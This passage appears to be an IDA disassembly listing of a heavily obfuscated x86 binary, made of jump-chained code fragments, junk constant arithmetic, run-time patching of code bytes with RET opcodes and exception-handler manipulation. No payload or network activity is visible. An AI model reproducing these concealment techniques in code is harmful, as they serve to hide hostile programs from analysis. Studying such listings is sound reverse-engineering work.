; START	OF FUNCTION CHUNK FOR sub_44809F

loc_444750:				; CODE XREF: sub_44809F+6247j
		jmp	nullsub_18
; END OF FUNCTION CHUNK	FOR sub_44809F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4571A0

loc_444755:				; CODE XREF: sub_4571A0-10355j
		jmp	loc_441607
; END OF FUNCTION CHUNK	FOR sub_4571A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44261C

loc_44475A:				; CODE XREF: sub_44261C+8j
		jmp	loc_43B0F0
; END OF FUNCTION CHUNK	FOR sub_44261C

; =============== S U B	R O U T	I N E =======================================



sub_44475F	proc near		; CODE XREF: hvvrg7ie:0043C16Cj
					; sub_45269F+Bp

; FUNCTION CHUNK AT 0044D5D8 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D5D8
sub_44475F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44476B	proc near		; CODE XREF: sub_405E33+47p
					; hvvrg7ie:00446D17j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043D6DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449437 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DA5 SIZE 00000010 BYTES

		push	esi
		push	1EBDFA4Fh

loc_444771:				; CODE XREF: hvvrg7ie:00457371j
		pop	esi
		jmp	loc_43D6DC
sub_44476B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_444777:				; CODE XREF: sub_44191F+DCBFj
		add	edx, ebp
		add	edx, 0CE7FF12Fh
		mov	[edx], ecx
		pop	edx
		mov	[ebp-6], dx
		mov	[ebp-4], eax
		xor	eax, eax
		jmp	loc_43D42C
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_444790:				; CODE XREF: sub_445F2A-7C4Cj
		pushf
		and	esi, 0A58EABD4h
		jmp	loc_45668D
; END OF FUNCTION CHUNK	FOR sub_445F2A

; =============== S U B	R O U T	I N E =======================================



sub_44479C	proc near		; DATA XREF: sub_4581FBo
		call	sub_4447AC
		jmp	ds:off_41D0D4
sub_44479C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_4447A7:				; CODE XREF: sub_456CD4-63EAj
		jmp	loc_452872
; END OF FUNCTION CHUNK	FOR sub_456CD4

; =============== S U B	R O U T	I N E =======================================



sub_4447AC	proc near		; CODE XREF: sub_43E75B:loc_442841j
					; sub_44479Cp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004394CC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043A3FF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043A6A0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004408A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004429B5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447E70 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044850A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448E2D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DBE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F6BE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004503BC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453986 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455EBB SIZE 0000000A BYTES

		jnb	loc_455EBB
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_44850A
sub_4447AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4447C1:				; CODE XREF: hvvrg7ie:loc_44ACFCj
					; DATA XREF: sub_449D53+9o
		mov	ebx, [eax+18h]
		call	sub_4522F8
; START	OF FUNCTION CHUNK FOR sub_447DE4

loc_4447C9:				; CODE XREF: sub_447DE4+Aj
		jmp	sub_4540B2
; END OF FUNCTION CHUNK	FOR sub_447DE4
; ---------------------------------------------------------------------------

loc_4447CE:				; CODE XREF: hvvrg7ie:0043D493j
		push	0ABD82293h

; =============== S U B	R O U T	I N E =======================================



sub_4447D3	proc near		; CODE XREF: sub_4419C0:loc_43934Ep

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044A03C SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edi, 1184037h
		popf
		jmp	loc_44A03C
sub_4447D3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4447E3:				; CODE XREF: hvvrg7ie:0044B0DDj
		jnb	loc_45B59A
		mov	ebp, [ecx]
		jmp	loc_45601F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_4447F0:				; CODE XREF: sub_43B3BE+6686j
		jnz	loc_442640
		test	edi, ecx
		jmp	loc_43F580
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
		mov	ds:off_41D100, eax
		lea	eax, sub_44631F
		push	offset sub_43FCF7
		jmp	locret_453200
; ---------------------------------------------------------------------------

loc_444813:				; CODE XREF: hvvrg7ie:00443AAEj
		push	edx
		push	ecx
		push	0CC67718Ch
		xchg	eax, [esp]
		mov	ecx, eax

loc_44481F:				; CODE XREF: hvvrg7ie:loc_457209j
		jmp	loc_4527DC
; ---------------------------------------------------------------------------
		dd 0C2EA8A0Fh, 77E9FFFFh, 87000033h, 55F32B2Bh,	7DAE8h
					; CODE XREF: hvvrg7ie:004459F5j
		dd 33E99D00h
		db 18h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_44483F:				; CODE XREF: sub_441FE4+EE44j
		push	offset sub_4551D4
		jmp	nullsub_433
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
		mov	ds:off_41D090, eax
		lea	eax, loc_44B7EA
		mov	byte ptr [eax],	0C3h
		jmp	loc_44B7EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A003

loc_44485D:				; CODE XREF: sub_45A003+4j
		mov	eax, [esp+0]
		push	edx
		call	sub_44E560
		jmp	loc_43F8F0
; END OF FUNCTION CHUNK	FOR sub_45A003
; ---------------------------------------------------------------------------

loc_44486B:				; CODE XREF: hvvrg7ie:0044DCD1j
		sub	edx, 0B5E76A99h
		push	6B492BBh
		xor	eax, 0EBBD19D2h

loc_44487C:				; CODE XREF: hvvrg7ie:loc_448520j
		push	2DF7EFB9h
		pop	eax
		rol	eax, 1Eh
		add	eax, 66CA1E83h
		add	eax, ebp
		jmp	loc_442AA8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_332. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_444893:				; CODE XREF: sub_448FB0+FBCCj
		jmp	loc_4515AE
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45190C

loc_444898:				; CODE XREF: sub_45190C-14048j
		jmp	nullsub_142
; END OF FUNCTION CHUNK	FOR sub_45190C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDC2

loc_44489D:				; CODE XREF: sub_43BDC2+8j
		jmp	loc_445A13
; END OF FUNCTION CHUNK	FOR sub_43BDC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_4448A2:				; CODE XREF: sub_4589D3:loc_44834Dj
		jz	loc_43FB4A
		jmp	loc_451843
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_4448AD:				; CODE XREF: sub_4426E2:loc_43E448j
		jz	loc_44855E
		jmp	loc_44626B
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_4448B8:				; CODE XREF: sub_44E3B3-1001Bj
		jnz	loc_4452BE
		jmp	loc_446B47
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_4448C4:				; CODE XREF: sub_43EB47+15CC3j
		jmp	loc_43950F
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449112

loc_4448C9:				; CODE XREF: sub_449112+21j
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_449112
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_4448CE:				; CODE XREF: sub_4500FA+AB6Dj
					; sub_4500FA+AB7Aj
		add	eax, 0B2731317h
		call	sub_456DE7
		push	595289C5h
		pop	eax
		or	eax, 2FFC1E83h
		test	eax, 80h
		jmp	loc_43BDF0
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44809F

loc_4448F0:				; CODE XREF: sub_44809F:loc_456C8Bj
		call	sub_446D8D
		mov	eax, 0B2EE4EE4h
		call	sub_450C5A
		mov	ds:dword_41D0C0, eax
		jmp	loc_44E2DD
; END OF FUNCTION CHUNK	FOR sub_44809F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_44490A:				; CODE XREF: sub_43D47E-23B4j
		xchg	eax, edi

loc_44490C:				; CODE XREF: sub_43D47E:loc_43B0BAj
		push	offset loc_457613
		jmp	nullsub_50
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_444916:				; CODE XREF: sub_43D285+11B27j
		test	al, al

loc_444918:				; CODE XREF: hvvrg7ie:loc_454FA6j
		jz	loc_43B234
		jmp	loc_43A2FE
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_444923:				; CODE XREF: sub_4465A6-6076j
		xchg	ecx, edx
		jz	loc_445FCF
		jge	loc_4559F7
		jmp	loc_45932A
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		sub	esi, 0F53F9C58h
		xchg	edx, edi
		jmp	sub_459E78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_444943:				; CODE XREF: sub_44957E:loc_44D86Bj
					; hvvrg7ie:0044D87Fj
		rol	ebx, 14h
		and	ebx, 0C192DB5Eh
; END OF FUNCTION CHUNK	FOR sub_44957E
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_44494C:				; CODE XREF: sub_446EC2:loc_457691j
		cmp	ebx, 4019D994h
		jmp	loc_43DDE6
; END OF FUNCTION CHUNK	FOR sub_446EC2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_309. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_444958:				; CODE XREF: hvvrg7ie:00458541j
		jmp	loc_451945
; ---------------------------------------------------------------------------

loc_44495D:				; CODE XREF: hvvrg7ie:00454DE3j
		jmp	loc_44A0FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_444962:				; CODE XREF: sub_442FD1+C9F3j
		jmp	nullsub_118
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_444967:				; CODE XREF: sub_4466CE+5BE8j
		jmp	loc_44F492
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44496C:				; CODE XREF: sub_450F97:loc_43E5D1j
		jnz	loc_44651F

loc_444972:				; CODE XREF: sub_455DA8-C947j
		jmp	loc_4455C4
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
		pushf
		sub	ecx, eax
		jmp	loc_446517
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444315

loc_44497F:				; CODE XREF: sub_444315:loc_447126j
		add	eax, 7A05CC09h
		push	ebx
		push	0E771E9C0h
		xchg	esi, [esp+8+var_8]
		mov	ebx, esi
		pop	esi
		jmp	loc_44A2E4
; END OF FUNCTION CHUNK	FOR sub_444315
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4572D1

loc_444996:				; CODE XREF: sub_4572D1:loc_447D69j
		call	sub_4454E1
		or	eax, eax
		jnz	nullsub_269

loc_4449A3:				; CODE XREF: sub_4572D1+6j
		call	sub_452EAF
		jmp	nullsub_269
; END OF FUNCTION CHUNK	FOR sub_4572D1

; =============== S U B	R O U T	I N E =======================================



sub_4449AD	proc near		; CODE XREF: sub_442FD1:loc_439017p
					; hvvrg7ie:0044FFF9j

; FUNCTION CHUNK AT 0043E0BC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449334 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AEEC SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		pop	edx
		jmp	loc_44AEEC
sub_4449AD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_4449B6:				; CODE XREF: sub_450434:loc_441257j
					; sub_442FD1+7j
		pop	ecx
		xchg	eax, [esp+0]
		push	eax
		pop	ebp
		xchg	edx, [esp+0]
		jmp	loc_456923
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_4449C4:				; CODE XREF: sub_44BCAE-E050j
					; sub_453422:loc_44FEFDj
		push	5BD66BB4h
		pop	eax
		and	eax, 57EF02A8h
		or	eax, 0AE586E01h
		call	sub_43CCC7

loc_4449DB:				; CODE XREF: sub_4495B9+997Bj
		jmp	loc_445A98
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451442

loc_4449E0:				; CODE XREF: sub_451442-F52Ej
		jmp	loc_43D2AB
; END OF FUNCTION CHUNK	FOR sub_451442
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A87E

loc_4449E5:				; CODE XREF: sub_44A87E-CDB0j
		jmp	loc_446127
; END OF FUNCTION CHUNK	FOR sub_44A87E
; ---------------------------------------------------------------------------
		ror	ecx, 19h
		jmp	loc_43B2C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_4449F2:				; CODE XREF: sub_44E3B3:loc_454A04j
		jz	loc_441864
		jmp	loc_4593C7
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_4449FD:				; CODE XREF: sub_43AB99:loc_44C334j
		jge	loc_458C81
		or	ecx, 0D3ADEC5Bh
		ror	ebp, 5
		jmp	loc_458C7B
; END OF FUNCTION CHUNK	FOR sub_43AB99
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_444A12:				; CODE XREF: sub_450434-11363j
		jmp	loc_453F1F
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B7D

loc_444A17:				; CODE XREF: sub_455B7D:loc_4550F8j
		xor	esi, ebx
		pop	ebx
		mov	ebp, 0B808E492h
		jmp	loc_44EC95
; END OF FUNCTION CHUNK	FOR sub_455B7D
; ---------------------------------------------------------------------------
		ror	ebp, 19h
		or	ebp, ebx
		jmp	sub_446A88
; ---------------------------------------------------------------------------

loc_444A2E:				; DATA XREF: hvvrg7ie:loc_45300Bo
		pop	large dword ptr	fs:0
		add	esp, 4
		push	0F5DEA750h
		pop	eax
		jmp	loc_450DC3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D671

loc_444A43:				; CODE XREF: sub_44D671:loc_4503B7j
		shr	esi, 0Eh
		jmp	loc_44E16A
; END OF FUNCTION CHUNK	FOR sub_44D671
; ---------------------------------------------------------------------------

loc_444A4B:				; CODE XREF: hvvrg7ie:loc_442F8Cj
		jnb	loc_43BFFF
		adc	eax, ecx
		xor	ecx, esi
		jmp	loc_45B1BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_444A5A:				; CODE XREF: sub_44D2F8:loc_447D73j
		jnz	loc_450BAA
		jmp	loc_43BABB
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_444A65:				; CODE XREF: sub_4546E9-D2ACj
					; sub_4546E9:loc_458B2Cj
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441C1D
		jmp	loc_44F8C7
; END OF FUNCTION CHUNK	FOR sub_4546E9

; =============== S U B	R O U T	I N E =======================================



sub_444A76	proc near		; DATA XREF: hvvrg7ie:0045193Bo
		lea	eax, sub_45190C
		mov	byte ptr [eax],	0C3h
		jmp	loc_43EC1F
sub_444A76	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45190C

loc_444A84:				; CODE XREF: sub_45190C+1j
		mov	eax, [esp+4+var_4]
		push	eax
		push	edx
		pop	eax
		xchg	eax, [esp+8+var_8]
		jmp	loc_43D8B5
; END OF FUNCTION CHUNK	FOR sub_45190C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_444A92:				; CODE XREF: sub_43EBB6:loc_43AD18j
		add	eax, edx
		push	offset sub_43D9B6
		jmp	nullsub_305
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------

loc_444A9E:				; CODE XREF: hvvrg7ie:00455782j
		push	0A7068089h

; =============== S U B	R O U T	I N E =======================================



sub_444AA3	proc near		; CODE XREF: hvvrg7ie:0043C873p

; FUNCTION CHUNK AT 00446B42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F953 SIZE 00000012 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0F9B7117Bh
		jmp	loc_446B42
sub_444AA3	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_444AB2:				; CODE XREF: sub_458095-1CD9Cj
		jmp	loc_44D00F
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CEB6

loc_444AB7:				; CODE XREF: sub_43CEB6:loc_43B18Aj
		jz	loc_459243
		add	edi, 0C5083496h
		sub	edi, edx
		not	eax
		jmp	loc_459243
; END OF FUNCTION CHUNK	FOR sub_43CEB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_444ACC:				; CODE XREF: sub_448BC0-9153j
		ja	loc_44DAFF
		sub	ebp, ebx
		push	4CAD2132h

loc_444AD9:				; CODE XREF: sub_448BC0:loc_44579Bj
		mov	eax, 1F56AC7Bh
		jmp	loc_45097F
; END OF FUNCTION CHUNK	FOR sub_448BC0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_444AE4:				; CODE XREF: sub_43F98C:loc_44278Cj
					; hvvrg7ie:004463C9j
		add	eax, 82A00B6Ah
		sub	eax, 4CC4DFC1h
		add	eax, 0DA81CE53h
		call	sub_44C91C

loc_444AFB:				; CODE XREF: sub_44ADCD+3j
		jmp	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448057

loc_444B00:				; CODE XREF: sub_448057-4FF0j
		jmp	nullsub_68
; END OF FUNCTION CHUNK	FOR sub_448057
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3E8

loc_444B05:				; CODE XREF: sub_44D3E8-EF84j
		jmp	nullsub_105
; END OF FUNCTION CHUNK	FOR sub_44D3E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_444B0A:				; CODE XREF: sub_44398A-8ED1j
		jmp	loc_456515
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_444B0F:				; CODE XREF: sub_445F2A:loc_45644Aj
		dec	eax
		sub	eax, 0FFFFFFFFh
		jl	loc_441477
		jmp	loc_4516CA
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_444B1E:				; CODE XREF: sub_446966:loc_45B20Cj
		jnz	loc_44F8EF
		jmp	loc_44CC99
; END OF FUNCTION CHUNK	FOR sub_446966

; =============== S U B	R O U T	I N E =======================================



sub_444B29	proc near		; CODE XREF: sub_43FD2B:loc_4455AAp
					; hvvrg7ie:00459255j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A30A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C1DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD72 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043E364 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F3FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440F17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044344D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044465E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004464B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448CC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449A70 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044B09A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E279 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044EA04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F532 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453C8A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454AFB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00456EBD SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		mov	ebp, esp
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+0]
		jmp	loc_44344D
sub_444B29	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_444B3B:				; CODE XREF: sub_43E128+18F76j
		mov	[ebx], edi
		js	loc_43A674

loc_444B43:				; CODE XREF: sub_43E128:loc_44202Fj
		push	offset sub_456944
		jmp	sub_459932
; END OF FUNCTION CHUNK	FOR sub_43E128

; =============== S U B	R O U T	I N E =======================================



sub_444B4D	proc near		; CODE XREF: hvvrg7ie:004403AFj
					; sub_443C1D+5p
		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_446D8D
		call	sub_4419C0
		jmp	ds:off_41D204
sub_444B4D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444B61:				; CODE XREF: hvvrg7ie:0045670Bj
		jmp	loc_450709
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507AA

loc_444B66:				; CODE XREF: sub_4507AA+6j
		jmp	nullsub_534
; END OF FUNCTION CHUNK	FOR sub_4507AA
; ---------------------------------------------------------------------------

loc_444B6B:				; CODE XREF: hvvrg7ie:0044E668j
		jmp	locret_44739F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_444B70:				; CODE XREF: sub_447E56-32C6j
					; hvvrg7ie:00447EB7j ...
		jnz	loc_43BA41
		pop	edx
		mov	eax, [esp+0]
		push	eax
		mov	eax, edx
		push	offset loc_44BC28
		jmp	nullsub_184
; ---------------------------------------------------------------------------

loc_444B87:				; CODE XREF: sub_447E56:loc_454001j
		add	esi, 87CD80D3h
		xchg	esi, [esp+4+var_4]
		jmp	loc_444B70
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_444B95:				; CODE XREF: sub_453405+58ABj
		rol	ecx, 12h
		shr	edx, 5
		test	esi, edx
		jmp	loc_45587E
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_444BA2:				; CODE XREF: sub_450AA8-BEAEj
		popf

loc_444BA3:				; CODE XREF: sub_450AA8:loc_4429AAj
					; sub_450AA8-CDA4j ...
		jmp	loc_451C75
; ---------------------------------------------------------------------------

loc_444BA8:				; CODE XREF: sub_450AA8-14C42j
					; sub_446E8C+CDE8j
		pop	ecx
		xchg	ecx, [esp-8+arg_4]
		mov	ebp, ecx
		pop	ecx
		jmp	loc_4559AE
; END OF FUNCTION CHUNK	FOR sub_450AA8

; =============== S U B	R O U T	I N E =======================================



sub_444BB4	proc near		; CODE XREF: sub_452B83-2E41p
					; hvvrg7ie:004570F3j

; FUNCTION CHUNK AT 0043CDB5 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0C3h
		jmp	loc_43CDB5
sub_444BB4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_444BC0:				; CODE XREF: sub_449425j
		pop	edx
		call	sub_43DC31

loc_444BC6:				; CODE XREF: sub_4544DD-139EEj
		jmp	loc_441186
; END OF FUNCTION CHUNK	FOR sub_449425
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_331. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_444BCC:				; DATA XREF: sub_43E813+1881Fo
		mov	eax, edx
		push	ecx
		push	20BEBC0Ah
		pop	ecx
		jmp	loc_43C96A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_444BDA:				; CODE XREF: sub_4495B9:loc_44E12Bj
		mov	[ecx], eax
		jmp	loc_440F8C
; END OF FUNCTION CHUNK	FOR sub_4495B9

; =============== S U B	R O U T	I N E =======================================



sub_444BE1	proc near		; DATA XREF: hvvrg7ie:loc_44213Ao

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004397DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439CDD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E6FB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043EB3E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043ED73 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F855 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440CC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004417C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A63 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442370 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443B15 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00444F36 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004451B1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446BEB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044766A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448044 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004482CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A3DE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A748 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044B6C0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044B756 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044D639 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E09E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FABE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453912 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456257 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458832 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458EC6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458FFD SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045938C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045968E SIZE 00000005 BYTES

		push	8B62295Ch
		pop	edi
		or	edi, 0B5B2D7DEh
		add	edi, 5BE36404h
		jmp	loc_44FABE
sub_444BE1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_444BF8:				; CODE XREF: sub_450AA8:loc_455953j
		and	ebp, edx
		jmp	loc_444BA2
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_444BFF:				; CODE XREF: sub_43B3BE+1DD54j
		jns	loc_44FA99
		jmp	loc_447CE9
